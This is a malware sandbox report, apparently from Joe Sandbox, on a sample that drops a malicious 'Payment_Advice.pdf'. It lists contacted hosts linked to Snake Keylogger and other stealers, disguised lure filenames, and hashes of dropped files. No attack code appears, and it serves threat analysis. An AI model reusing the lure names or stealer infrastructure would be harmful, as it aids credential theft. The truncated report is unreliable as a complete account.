Excluded IPs from analysis (whitelisted): 23.209.56.185, 34.193.227.236, 107.22.247.231, 54.144.73.197, 18.207.85.246, 172.64.41.3, 162.159.61.3, 23.59.26.101, 23.207.202.183, 23.207.202.196, 23.207.202.186, 23.207.202.187, 23.45.233.19, 23.45.233.26, 23.45.233.9, 184.25.58.168, 184.25.58.138, 23.45.233.10, 23.45.233.11, 23.45.233.8, 23.45.233.49, 23.45.233.32
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target powershell.exe, PID 3532 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:17:05	API Interceptor	36x Sleep call for process: powershell.exe modified
15:17:09	API Interceptor	2x Sleep call for process: svchost.exe modified
15:17:27	API Interceptor	131634x Sleep call for process: hadvices.scr modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.210.0.138	phish_alert_sp2_2.0.0.0 (14).eml	Get hash	malicious	HTMLPhisher	Browse
104.21.67.152	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
172.67.169.18	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe	Get hash	malicious	Snake Keylogger	Browse
	vessel details.exe	Get hash	malicious	Snake Keylogger	Browse
108.167.142.65	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse
158.101.44.242	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	order.exe	Get hash	malicious	Unknown	Browse	158.101.44.242
	0FvHGK2cyk.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.6.168
	M0uVrW4HJb.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
mail.qoldenfrontier.com	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	108.167.142.65
reallyfreegeoip.org	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Pnihosiyvr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.177.134
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
scratchdreams.tk	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	172.67.169.18
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	rSyDiExlek.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	MegaUniversesMQ.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	EPQ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	http://www.corpsierramadre.com/	Get hash	malicious	Unknown	Browse	104.21.93.126
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	MegaUniversesMQ.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/e	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.20.4.235
AKAMAI-ASUS	https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJhc2FsaW5yZWljQGdtYWlsLmNvbSIsInJlcXVlc3RJZCI6ImZiNDJhMDI2LWFkYWMtNGUwNS01N2IyLWJiMTJmMWQ2ZjFmNSIsImxpbmsiOiJodHRwczovL2Fjcm9iYXQuYWRvYmUuY29tL2lkL3VybjphYWlkOnNjOlZBNkMyOmJkNjM3YjUxLTcwNmEtNDg4Ni05MjZkLTA2ZjM5NTI0YWZmMCIsImxhYmVsIjoiMTIiLCJsb2NhbGUiOiJlbl9VUyJ9.nBjy2vHS9kz9dh9gF6utGztizGQUAyT8p2Xs_LMlQGFyIPy7jWdbqBvo7EWIO0M0gFEWfg1FhrU_boE4Fc2VGw	Get hash	malicious	Unknown	Browse	23.209.57.57
	file.exe	Get hash	malicious	Vidar	Browse	104.105.90.131
	vylI38MZOn.elf	Get hash	malicious	Mirai	Browse	23.44.181.13
	JdlqBuKl3n.elf	Get hash	malicious	Mirai	Browse	72.247.1.106
	L31owFeEHg.elf	Get hash	malicious	Mirai	Browse	23.218.112.21
	KFOxk19cHL.elf	Get hash	malicious	Mirai	Browse	104.91.41.146
	WlCIinu0yp.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRAT	Browse	104.104.85.160
	file.exe	Get hash	malicious	Unknown	Browse	184.26.41.138
	http://goofle.com	Get hash	malicious	Unknown	Browse	23.40.179.53
	file.exe	Get hash	malicious	LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse	23.210.138.105
CLOUDFLARENETUS	MegaUniversesMQ.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	EPQ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	http://www.corpsierramadre.com/	Get hash	malicious	Unknown	Browse	104.21.93.126
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	MegaUniversesMQ.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/e	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.20.4.235
ORACLE-BMC-31898US	https://meet.servers.getgo.com/opener/e30.eyJpYXQiOjE3MTQ0OTcwOTYsImxhdW5jaFBhcmFtcyI6eyJidWlsZCI6IjE5OTUwIiwidGVsZW1ldHJ5VVJMIjoiaHR0cHM6Ly9sYXVuY2hzdGF0dXMuZ2V0Z28uY29tL2xhdW5jaGVyMi90ZWxlbWV0cnkvaGVscGVyP3Rva2VuPWcybS1yNGFnZXJmbmM4eGM1YnQwb2ZwY2poZC1iMTk5NTAtc2Nsc0pvaW5fYjBmZGI5NjFfNjM2OF80YTU2XzgwMTFfMmI0ZTlmYjEzNmRmIiwiZW5kcG9pbnRQYXJhbXMiOnsiUHJvZHVjdCI6ImcybSIsInNlc3Npb25UcmFja2luZ0lkIjoiY2xzSm9pbi1iMGZkYjk2MS02MzY4LTRhNTYtODAxMS0yYjRlOWZiMTM2ZGYiLCJsYXVuY2hVcmwiOiJtZWV0aW5nP3Nlc3Npb25UcmFja2luZ0lkPWNsc0pvaW4tYjBmZGI5NjEtNjM2OC00YTU2LTgwMTEtMmI0ZTlmYjEzNmRmJmNsaWVudEdlbmVyYXRpb249cm9sbGluZyIsImVudiI6ImxpdmUifX0sInZlcnNpb24iOiIxLjAiLCJmbG93VHlwZSI6ImpvaW4iLCJlbmRwb2ludEZsYXZvciI6eyJmbGF2b3IiOiJuZXV0cm9uIiwiZmxhdm9yRW5mb3JjZWQiOiJ0cnVlIn0sImlzRmxhdm9yRmluYWwiOnRydWV9.e30	Get hash	malicious	Unknown	Browse	150.136.248.95
	FiddlerSetup.5.0.20242.10753-latest.exe.7z	Get hash	malicious	PureLog Stealer, zgRAT	Browse	192.29.11.142
	0t102oBJAv.elf	Get hash	malicious	Mirai	Browse	150.136.104.140
	0Vjz9RSZxz.elf	Get hash	malicious	Mirai	Browse	130.61.43.131
	BnH5cceMGl.elf	Get hash	malicious	Mirai	Browse	193.122.239.169
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.130.0
	SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	98zdN8lGtk.elf	Get hash	malicious	Unknown	Browse	140.91.251.37
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.6.168
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
UNIFIEDLAYER-AS-1US	PI No. LI-4325.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	162.240.81.18
	Purchase Order_pdf.exe.gz.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.185.166.221
	https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/e	Get hash	malicious	HTMLPhisher	Browse	192.185.84.89
	https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/e	Get hash	malicious	HTMLPhisher	Browse	192.185.84.89
	https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/e	Get hash	malicious	HTMLPhisher	Browse	192.185.84.89
	FedEx DOC_773690995161.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	192.185.166.221
	InvoiceDemurrage.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	67.20.116.106
	NOA, BL and invoice.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	50.87.150.204
	https://epaidea.com/wp-includes/vh/c.html	Get hash	malicious	Unknown	Browse	192.185.153.106
	https://bing.com///////////////////////////ck/a?!&&p=9800195a72dfec27JmltdHM9MTcxNDM0ODgwMCZpZ3VpZD0yOWFmMGU4ZS02MTgwLTY4NDUtMWIwOC0xYWJkNjBhYTY5MGImaW5zaWQ9NTIxNg&ptn=3&ver=2&hsh=3&fclid=29af0e8e-6180-6845-1b08-1abd60aa690b&psq=https%3A%2F%2F9dcare.com.au&u=a1aHR0cHM6Ly93d3cuOWRjYXJlLmNvbS5hdS9hYm91dC11cy8	Get hash	malicious	HTMLPhisher	Browse	192.185.120.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	1nS3mkPS10.exe	Get hash	malicious	LimeRAT	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.21.67.152
	DEKONT.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.67.152
	https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.21.67.152
	hRsK5gPX8l.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	T1SEuO2fxi.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
	T1SEuO2fxi.exe	Get hash	malicious	Xehook Stealer	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	EPQ.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.21.27.63 172.67.169.18
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.63 172.67.169.18
	SWIFT COPY.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.63 172.67.169.18
	SecuriteInfo.com.Win32.PWSX-gen.1403.24614.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.27.63 172.67.169.18
	Swift-Message01052024002ML_qdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.27.63 172.67.169.18
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.27.63 172.67.169.18
	Specification 1223.vbs	Get hash	malicious	AgentTesla	Browse	104.21.27.63 172.67.169.18
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.27.63 172.67.169.18
	CARTASCONF_PDF.vbs	Get hash	malicious	Unknown	Browse	104.21.27.63 172.67.169.18
	SWIFT_Details#64737389.vbs	Get hash	malicious	Unknown	Browse	104.21.27.63 172.67.169.18

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7263095918082016
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0V:9JZj5MiKNnNhoxu4
MD5:	57CC491C5123A4463965C07FC1CF355D
SHA1:	F0E5543874A22353E662561944A132D03FFF1DE4
SHA-256:	4D295E7AE9ABC3B9703A6413815FA09671B1ED117CC5B44A8A2A79240B378150
SHA-512:	FB941A53B2E4806CB9DD987A6D15F61A49688803581684E0DF5C6434AE35DE03C44B75BBE562F7EFB2A86AFD7C448E875D13C18010C8668ADC5586EC4B22351C
Malicious:	false
Reputation:	low
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xb532ac29, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.755563224608106
Encrypted:	false
SSDEEP:	1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
MD5:	0177809F6893E2AB5ED4AB0C0C1127C9
SHA1:	25D8987BB465D2970068404BAF2C366B002BC46C
SHA-256:	23C55FEBA48988F8DE4CF3E3C9D94CB12E7AB6B4FCF6010D0EFB620CDFE52CB6
SHA-512:	3211A7ADDBAE364BC4CB7F78B86F7657A68B6A05EF4EA11E526DB22AE8EC852BAD7336BB82063B2F277E7F41D895C7BFBD024C72EB4F9EBB51B70C01EA63F806
Malicious:	false
Reputation:	low
Preview:	.2.)... .......7.......X\...;...{......................0.e......!...{?......\|?.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................2.......\|w..................mW......\|?..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07933406113234748
Encrypted:	false
SSDEEP:	3:PmXEYebRpkj3EjgGuNaAPaU1lvnC3ajllll/olluxmO+l/SNxOf:PdzbRpkj3EjluNDPaUnC3ajltAgmOH
MD5:	267FC25E9890FBA6AC42603046890A89
SHA1:	2D9EDF3682F2B30375C6C9FE9F9EBA4D36B80AD1
SHA-256:	B1914DFD76E00FCD2280D3161314CADF367EBB86E0E967E7E734486D8C738652
SHA-512:	3E7A5EBA154F320594FCDA0463563BC26264A504B3BDC418138316398D2CF6A8314C5BD228012E69D8B3112D1C12F5CE577E57CE0E9D470A3AAFA996337912C5
Malicious:	false
Reputation:	low
Preview:	.($.....................................;...{.......\|?..!...{?..........!...{?..!...{?..g...!...{?..................mW......\|?.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Payment_Advice.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 1 pages
Category:	dropped
Size (bytes):	502695
Entropy (8bit):	7.210153211803877
Encrypted:	false
SSDEEP:	6144:64zLGoksGfh1BpNxE/Tb4CvJLGOwSc/12r3Or/WBo8YFISKYPaA9nFw2N3eNCW1:6SiscDS/PvJSSW2rIF8YwYt9nFw2RLW1
MD5:	7FB38EC672E93118DE75747E60232837
SHA1:	32313AB4489CBC195637C8E3B62BDD799A54D1B7
SHA-256:	80E8B1A5F0008B00EE033242975E238B68127CBDE39ABB97CE7EC6147138AB94
SHA-512:	3E969865C47A16BF75B14D5C423CFA2D6BDB2F278F320EEAE3160C28C8D8A454F8AD97B936F4F08681A104321316A94EFA1D089F20F0AF22E1D591E474A1BBD8
Malicious:	true
Reputation:	low
Preview:	%PDF-1.4..%......1 0 obj..<<../Type /Page../MediaBox [ 0 0 595 842 ]../Resources << /XObject << /X0 3 0 R >> >>../Contents 4 0 R../Parent 2 0 R../Rotate 360..>>..endobj..3 0 obj..<<../Type /XObject../Subtype /Image../Width 2480../Height 3509../BitsPerComponent 8../ColorSpace /DeviceRGB../Filter /DCTDecode../Length 501818..>>..stream.......C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.239391660885617
Encrypted:	false
SSDEEP:	6:DtT+q2PN72nKuAl9OmbnIFUt86toZmw+6t4VkwON72nKuAl9OmbjLJ:DAvVaHAahFUt86S/+6e5OaHAaSJ
MD5:	C56DA373F4483EE750F4AD4749AB12EC
SHA1:	A4E0EA08C2719E9ABDA35114DD9233281C8C2D86
SHA-256:	5D360E73CA4360DC307485348EEFC39DAB0550ECA6A3EAA89A2E6781CB3DEF1E
SHA-512:	712D8711722796CB3B6A2E0032EF92C1980AB01378CB0AC63115B084C34AD0D5CBF950E6EE2F518EDC56C4815B4EC9EDB55C424C216C3119553C94BF02A672BE
Malicious:	false
Reputation:	low
Preview:	2024/05/01-15:17:09.377 6e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/01-15:17:09.378 6e8 Recovering log #3.2024/05/01-15:17:09.378 6e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.239391660885617
Encrypted:	false
SSDEEP:	6:DtT+q2PN72nKuAl9OmbnIFUt86toZmw+6t4VkwON72nKuAl9OmbjLJ:DAvVaHAahFUt86S/+6e5OaHAaSJ
MD5:	C56DA373F4483EE750F4AD4749AB12EC
SHA1:	A4E0EA08C2719E9ABDA35114DD9233281C8C2D86
SHA-256:	5D360E73CA4360DC307485348EEFC39DAB0550ECA6A3EAA89A2E6781CB3DEF1E
SHA-512:	712D8711722796CB3B6A2E0032EF92C1980AB01378CB0AC63115B084C34AD0D5CBF950E6EE2F518EDC56C4815B4EC9EDB55C424C216C3119553C94BF02A672BE
Malicious:	false
Preview:	2024/05/01-15:17:09.377 6e8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/01-15:17:09.378 6e8 Recovering log #3.2024/05/01-15:17:09.378 6e8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.180975233335189
Encrypted:	false
SSDEEP:	6:Dt3dM4Q+q2PN72nKuAl9Ombzo2jMGIFUt86t3dFdWZmw+6t3da4QVkwON72nKuAv:DB++vVaHAa8uFUt86Bo/+6B8V5OaHAaU
MD5:	4A773FD2C0C9E65AE3349C069AC78786
SHA1:	8475EF973B3DE431FAD4332147DF1ED48CBAF2A2
SHA-256:	D63642433B0AD0DC2295C492EA71D03996855F9BB92D530129CA0CEFF2E676DC
SHA-512:	E8927889C3B2A6B1C5372786ED1E8A2FD3F2449F1EEEF8F5128389F54CC8B1D380AFF0012B9FD864A2396FD83CC6033D24CAA6E7B6240017376EED14E13536A4
Malicious:	false
Preview:	2024/05/01-15:17:09.480 130c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/01-15:17:09.482 130c Recovering log #3.2024/05/01-15:17:09.486 130c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.180975233335189
Encrypted:	false
SSDEEP:	6:Dt3dM4Q+q2PN72nKuAl9Ombzo2jMGIFUt86t3dFdWZmw+6t3da4QVkwON72nKuAv:DB++vVaHAa8uFUt86Bo/+6B8V5OaHAaU
MD5:	4A773FD2C0C9E65AE3349C069AC78786
SHA1:	8475EF973B3DE431FAD4332147DF1ED48CBAF2A2
SHA-256:	D63642433B0AD0DC2295C492EA71D03996855F9BB92D530129CA0CEFF2E676DC
SHA-512:	E8927889C3B2A6B1C5372786ED1E8A2FD3F2449F1EEEF8F5128389F54CC8B1D380AFF0012B9FD864A2396FD83CC6033D24CAA6E7B6240017376EED14E13536A4
Malicious:	false
Preview:	2024/05/01-15:17:09.480 130c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/01-15:17:09.482 130c Recovering log #3.2024/05/01-15:17:09.486 130c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	474
Entropy (8bit):	4.966326216070153
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqZcOzsBdOg2HZZcaq3QYiubcP7E4T3y:Y2sRdsIUdMHO3QYhbA7nby
MD5:	DDCCAA79DAFA5C3BC978609B7F936D94
SHA1:	B19F2C8F152E7A6D0ABF6DC017D4FD776D5855D6
